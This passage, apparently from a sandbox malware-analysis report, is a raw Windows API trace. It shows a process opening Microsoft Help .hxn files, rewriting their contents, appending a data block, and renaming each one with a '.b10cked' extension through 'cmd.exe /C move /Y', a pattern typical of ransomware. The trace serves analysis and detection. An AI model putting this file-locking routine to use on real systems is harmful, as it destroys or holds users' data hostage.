GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn", 
lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN") returned 0x27 [0199.124] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.176] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe58, dwThreadId=0xe84)) returned 1 [0199.283] CloseHandle (hObject=0x1b4) returned 1 [0199.283] CloseHandle (hObject=0x120) returned 1 [0199.283] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.283] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.283] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.283] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0199.283] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.284] ReleaseMutex (hMutex=0xf8) returned 1 [0199.284] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25607401321) returned 1 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.286] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.286] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.288] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0199.288] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0199.288] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0199.288] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0199.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0199.292] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0199.292] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.292] CloseHandle (hObject=0x120) returned 1 [0199.293] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN") returned 0x27 [0199.294] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.294] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xda8, dwThreadId=0x608)) returned 1 [0199.454] CloseHandle (hObject=0x1b4) returned 1 [0199.454] CloseHandle (hObject=0x120) returned 1 [0199.454] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.454] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.454] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) 
returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.454] ReleaseMutex (hMutex=0xf8) returned 1 [0199.454] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.455] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25624390542) returned 1 [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.462] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.463] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.464] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.464] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.464] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.466] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.466] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0199.466] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0199.466] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0199.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0199.472] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0199.472] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.472] CloseHandle (hObject=0x120) returned 1 [0199.473] GetShortPathNameW (in: 